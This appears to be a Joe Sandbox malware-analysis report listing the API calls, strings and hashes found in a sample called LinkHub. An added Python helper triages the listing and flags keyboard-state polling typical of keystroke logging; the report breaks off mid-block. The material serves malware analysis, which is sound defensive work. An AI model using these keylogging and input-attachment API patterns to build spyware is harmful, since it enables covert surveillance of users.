                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CD04D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 4f088a674cc1720815204a5e0c97f9c9d88e9fccca41c0d8696c76eed13717a1
                                                                    • Instruction ID: e418be47df32e7a3cd1ac5c24217cd3624f48364f8f2d3094474f11b3e2a36c7
                                                                    • Opcode Fuzzy Hash: 4f088a674cc1720815204a5e0c97f9c9d88e9fccca41c0d8696c76eed13717a1
                                                                    • Instruction Fuzzy Hash: A7415235A002199FCB10DFA9D844EAD7BB9FF48354F10806AEA59E7361D730E945CBA0
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00CDA65D
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00CDA6DE
                                                                    • GetKeyState.USER32(000000A0), ref: 00CDA6F9
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00CDA713
                                                                    • GetKeyState.USER32(000000A1), ref: 00CDA728
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00CDA740
                                                                    • GetKeyState.USER32(00000011), ref: 00CDA752
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00CDA76A
                                                                    • GetKeyState.USER32(00000012), ref: 00CDA77C
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00CDA794
                                                                    • GetKeyState.USER32(0000005B), ref: 00CDA7A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: cbd977c187b4586ccdd0eaf5567e434863003bbf26700a449956d701807a2722
                                                                    • Instruction ID: 480018bb37ad617e37ebab53ab3cbeb3f2392bf59a5df100532cf1ac9ed61085
                                                                    • Opcode Fuzzy Hash: cbd977c187b4586ccdd0eaf5567e434863003bbf26700a449956d701807a2722
                                                                    • Instruction Fuzzy Hash: FF41A4645047C96DFF31976088043B5BEB16B12344F09805BD7E64A7C2EBA49BC8C7A3
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00CF1019
                                                                    • inet_addr.WSOCK32(?), ref: 00CF1079
                                                                    • gethostbyname.WSOCK32(?), ref: 00CF1085
                                                                    • IcmpCreateFile.IPHLPAPI ref: 00CF1093
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CF1123
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CF1142
                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00CF1216
                                                                    • WSACleanup.WSOCK32 ref: 00CF121C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: aa89018a0ed4917a3c0ff5e25e843e75405127954dc60c9dfb6d6a18bf438371
                                                                    • Instruction ID: c17bde372e8bdafe540908b8f38211d55c8beab3285483d2d3f3d50aced1040a
                                                                    • Opcode Fuzzy Hash: aa89018a0ed4917a3c0ff5e25e843e75405127954dc60c9dfb6d6a18bf438371
                                                                    • Instruction Fuzzy Hash: B4919E31604201DFD760DF15C888B2ABBE1BF44318F188599EA69CB7A2C731ED45CB92
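The two function blocks above (the GetAsyncKeyState/GetKeyState polling block at 00CDA65D and the IcmpSendEcho block at 00CF1019) are the kind of listing an analyst reads by hand: the API ID line only names the functions, so the interesting facts sit in the arguments. The following Python helper is an added example and is not part of the Joe Sandbox report or of the sample; it parses report lines of the form `• Func.MODULE(args), ref: addr`, decodes the hexadecimal arguments, and tags a block with behaviour labels. The rule table, the label names and the `triage` return shape are this example's own assumptions; the two sample blocks are copied verbatim from the listing above, and the virtual-key names are the documented Windows constants for those values.

```python
"""Triage helper for Joe Sandbox "APIs" function listings (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

# One report line, e.g.
#   • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CF1123
#   • CoUninitialize.OLE32 ref: 00CE8821
#   • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented Windows virtual-key codes that show up as GetAsyncKeyState/GetKeyState arguments.
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
            0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}

# Behaviour labels (names chosen for this example): label -> APIs that must all be called directly.
RULES = {
    "keyboard state polling": {"GetAsyncKeyState", "GetKeyState"},
    "icmp reachability check": {"IcmpCreateFile", "IcmpSendEcho"},
    "hostname resolution": {"gethostbyname"},
    "com object instantiation": {"CoCreateInstance"},
    "folder browse dialog": {"SHBrowseForFolderW"},
}


@dataclass
class ApiCall:
    func: str
    module: str
    args: list      # int for a hex literal, None for an unresolved "?"
    ref: int        # call-site address from the "ref:" field
    subcall: bool   # True for "Part of subcall function" lines (callee's APIs, not this block's)


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for a report API line, or None for any other line."""
    m = API_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [] if raw is None or raw.strip() == "" else [
        None if a.strip() == "?" else int(a.strip(), 16) for a in raw.split(",")]
    return ApiCall(m.group("func"), m.group("module"), args,
                   int(m.group("ref"), 16), m.group("sub") is not None)


def parse_block(text: str) -> list:
    """Parse every API line in one function block; non-API lines are skipped."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c is not None]


def triage(text: str) -> dict:
    """Label a block and decode the arguments an analyst would want spelled out."""
    calls = parse_block(text)
    direct = {c.func for c in calls if not c.subcall}   # subcall lines belong to a helper, not this block
    labels = sorted(name for name, need in RULES.items() if need <= direct)
    notes = []
    keys = sorted({c.args[0] for c in calls
                   if c.func in ("GetAsyncKeyState", "GetKeyState") and c.args and c.args[0] is not None})
    if keys:
        notes.append("polls " + ", ".join(VK_NAMES.get(k, f"0x{k:02X}") for k in keys))
    for c in calls:
        # IcmpSendEcho takes 8 parameters; the last one is the reply timeout in milliseconds.
        if c.func == "IcmpSendEcho" and len(c.args) == 8 and c.args[-1] is not None:
            notes.append(f"IcmpSendEcho timeout {c.args[-1]} ms")
            break
    refs = [c.ref for c in calls if not c.subcall]
    return {"calls": len(calls), "labels": labels, "notes": notes,
            "span": (min(refs), max(refs)) if refs else None}


# Sample input: the two blocks copied from the report listing above.
KEYBOARD_BLOCK = """
• GetKeyboardState.USER32(?), ref: 00CDA65D
• GetAsyncKeyState.USER32(000000A0), ref: 00CDA6DE
• GetKeyState.USER32(000000A0), ref: 00CDA6F9
• GetAsyncKeyState.USER32(000000A1), ref: 00CDA713
• GetKeyState.USER32(000000A1), ref: 00CDA728
• GetAsyncKeyState.USER32(00000011), ref: 00CDA740
• GetKeyState.USER32(00000011), ref: 00CDA752
• GetAsyncKeyState.USER32(00000012), ref: 00CDA76A
• GetKeyState.USER32(00000012), ref: 00CDA77C
• GetAsyncKeyState.USER32(0000005B), ref: 00CDA794
• GetKeyState.USER32(0000005B), ref: 00CDA7A6
"""

ICMP_BLOCK = """
• WSAStartup.WSOCK32(00000101,?), ref: 00CF1019
• inet_addr.WSOCK32(?), ref: 00CF1079
• gethostbyname.WSOCK32(?), ref: 00CF1085
• IcmpCreateFile.IPHLPAPI ref: 00CF1093
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CF1123
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CF1142
• IcmpCloseHandle.IPHLPAPI(?), ref: 00CF1216
• WSACleanup.WSOCK32 ref: 00CF121C
"""

if __name__ == "__main__":
    for name, block in (("keyboard", KEYBOARD_BLOCK), ("icmp", ICMP_BLOCK)):
        print(name, triage(block))
```

Run against the keyboard block this reports `keyboard state polling` with the note `polls VK_CONTROL, VK_MENU, VK_LWIN, VK_LSHIFT, VK_RSHIFT`, i.e. a modifier-key state check of exactly the keys a keystroke logger needs to reconstruct what was typed; against the ICMP block it reports a reachability check with a 4000 ms reply timeout. Lines marked "Part of subcall function" are kept in the call list but excluded from label matching and from the address span, so a helper's `_wcslen` or `GetClassNameW` is not attributed to the caller's block.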
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharLower
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 707087890-567219261
                                                                    • Opcode ID: ffaa82cc9068dd9af3910d4d3b208f873944a74e4e4599dc459b8ac9f5a3a6a1
                                                                    • Instruction ID: 6b9d199921eefd4092daec56ebda3ecafda1bcdf1686045583235d2e7f028a84
                                                                    • Opcode Fuzzy Hash: ffaa82cc9068dd9af3910d4d3b208f873944a74e4e4599dc459b8ac9f5a3a6a1
                                                                    • Instruction Fuzzy Hash: 80510631A0011A9BCF14DF68C940ABDB7A1FF25360B214229E93AE72C4D731DE40D792
                                                                    APIs
                                                                    • CoInitialize.OLE32 ref: 00CF41D1
                                                                    • CoUninitialize.OLE32 ref: 00CF41DC
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00D10B44,?), ref: 00CF4236
                                                                    • IIDFromString.OLE32(?,?), ref: 00CF42A9
                                                                    • VariantInit.OLEAUT32(?), ref: 00CF4341
                                                                    • VariantClear.OLEAUT32(?), ref: 00CF4393
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 636576611-1287834457
                                                                    • Opcode ID: 97898eedfc576aed25ae61fa1ff5fb782b622dd7f92c92c5fa17156829c62b06
                                                                    • Instruction ID: f6391de7c5134f60233acd9b011d74c96346939548609448a9a85e0452c3137d
                                                                    • Opcode Fuzzy Hash: 97898eedfc576aed25ae61fa1ff5fb782b622dd7f92c92c5fa17156829c62b06
                                                                    • Instruction Fuzzy Hash: E361C070608305AFC314DF65C888B6BBBE4EF48714F10491AF685972A1CB70ED48DB93
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 00CE8C9C
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CE8CAC
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CE8CB8
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CE8D55
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8D69
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8D9B
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CE8DD1
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE8DDA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                    • String ID: *.*
                                                                    • API String ID: 1464919966-438819550
                                                                    • Opcode ID: 9c48fb031b0fe8785b6ea165ede02f867bd2ee33a1c96531efb84cb28469bfc6
                                                                    • Instruction ID: c0934d31c6f21dda63889e375a8b118782f6618f41cbdbd8c3f7023148bc0613
                                                                    • Opcode Fuzzy Hash: 9c48fb031b0fe8785b6ea165ede02f867bd2ee33a1c96531efb84cb28469bfc6
                                                                    • Instruction Fuzzy Hash: 63614872504345AFCB10EF65C88499EB3E8FF99310F04891EF99987251DB31EA49CBA2
                                                                    APIs
                                                                    • CreateMenu.USER32 ref: 00D04715
                                                                    • SetMenu.USER32(?,00000000), ref: 00D04724
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D047AC
                                                                    • IsMenu.USER32(?), ref: 00D047C0
                                                                    • CreatePopupMenu.USER32 ref: 00D047CA
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D047F7
                                                                    • DrawMenuBar.USER32 ref: 00D047FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                    • String ID: 0$F
                                                                    • API String ID: 161812096-3044882817
                                                                    • Opcode ID: 7e3d1d94ab5f089b196f11ff91dd34ab4a34874ca0d0f62d0faba2f32f73c0a6
                                                                    • Instruction ID: 781d461896318efff3aaeba7c76368cba86172719bae37667edd458b6b4c6c11
                                                                    • Opcode Fuzzy Hash: 7e3d1d94ab5f089b196f11ff91dd34ab4a34874ca0d0f62d0faba2f32f73c0a6
                                                                    • Instruction Fuzzy Hash: D2411CB5A01305AFDB24DFA4D848FAA7BB6FF4A314F144429FA4997390D770A914CF60
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00CD28B1
                                                                    • GetDlgCtrlID.USER32 ref: 00CD28BC
                                                                    • GetParent.USER32 ref: 00CD28D8
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD28DB
                                                                    • GetDlgCtrlID.USER32(?), ref: 00CD28E4
                                                                    • GetParent.USER32(?), ref: 00CD28F8
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD28FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 711023334-1403004172
                                                                    • Opcode ID: 9b626d0e0f495f745e2d9f38a4fc651c85ae31b1efe65afed164aed186299039
                                                                    • Instruction ID: 2ebde126d821a0c6848d28a0e50b366440cd9c0dee59fb9e216560cc0b10345f
                                                                    • Opcode Fuzzy Hash: 9b626d0e0f495f745e2d9f38a4fc651c85ae31b1efe65afed164aed186299039
                                                                    • Instruction Fuzzy Hash: D421B075900218BBCF04ABA0CC85EEEBBB5EF15310F504117BA65A33A1DB354908EB70
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CD45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00CD4620
                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00CD2990
                                                                    • GetDlgCtrlID.USER32 ref: 00CD299B
                                                                    • GetParent.USER32 ref: 00CD29B7
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD29BA
                                                                    • GetDlgCtrlID.USER32(?), ref: 00CD29C3
                                                                    • GetParent.USER32(?), ref: 00CD29D7
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CD29DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 711023334-1403004172
                                                                    • Opcode ID: 0b874fb31047d72811392c20e3df8dd19a6ea90f9735dcf21df7d8e9b307ae92
                                                                    • Instruction ID: cdda2dcb8c4dded9945634fc8cf8efaaaf7faedb0c9a88d427cf9219e6d09842
                                                                    • Opcode Fuzzy Hash: 0b874fb31047d72811392c20e3df8dd19a6ea90f9735dcf21df7d8e9b307ae92
                                                                    • Instruction Fuzzy Hash: D021D175900218BBCF10ABA0CC85FEEBBB9EF14300F508117BA55A32A1DB358909DB70
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D04539
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00D0453C
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D04563
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D04586
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00D045FE
                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00D04648
                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00D04663
                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00D0467E
                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00D04692
                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00D046AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 312131281-0
                                                                    • Opcode ID: f33313aad60bc643fe1a2bcdebf0df20157173312119f6b87b8f0688bce4a8a6
                                                                    • Instruction ID: d2e46d2215b6e6c81f4ed1f622cad9abb4b71164315562d1fee5a1745792f1b2
                                                                    • Opcode Fuzzy Hash: f33313aad60bc643fe1a2bcdebf0df20157173312119f6b87b8f0688bce4a8a6
                                                                    • Instruction Fuzzy Hash: 5B6168B5A00218AFDB10DFA4CC81FEE77B8EB0A310F544159FA18E73A1D775A985DB60
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00CDBB18
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBB2C
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00CDBB33
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBB42
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CDBB54
                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBB6D
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBB7F
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBBC4
                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBBD9
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00CDABA8,?,00000001), ref: 00CDBBE4
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: dbdce8ddd12c7c7624d08b516bb727c14a41129161f99ddd55c0a2c265bea90e
                                                                    • Instruction ID: dcc0f561da10935c19f0be8888c045c2c953e4b3efde54da5ae2d99f891f1011
                                                                    • Opcode Fuzzy Hash: dbdce8ddd12c7c7624d08b516bb727c14a41129161f99ddd55c0a2c265bea90e
                                                                    • Instruction Fuzzy Hash: B8312875904308BFDB109F54DC85B6976AAAB45312F12401BFB15D63A4D774DE808B60
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00CA3007
                                                                      • Part of subcall function 00CA2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?), ref: 00CA2D4E
                                                                      • Part of subcall function 00CA2D38: GetLastError.KERNEL32(?,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?,?), ref: 00CA2D60
                                                                    • _free.LIBCMT ref: 00CA3013
                                                                    • _free.LIBCMT ref: 00CA301E
                                                                    • _free.LIBCMT ref: 00CA3029
                                                                    • _free.LIBCMT ref: 00CA3034
                                                                    • _free.LIBCMT ref: 00CA303F
                                                                    • _free.LIBCMT ref: 00CA304A
                                                                    • _free.LIBCMT ref: 00CA3055
                                                                    • _free.LIBCMT ref: 00CA3060
                                                                    • _free.LIBCMT ref: 00CA306E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
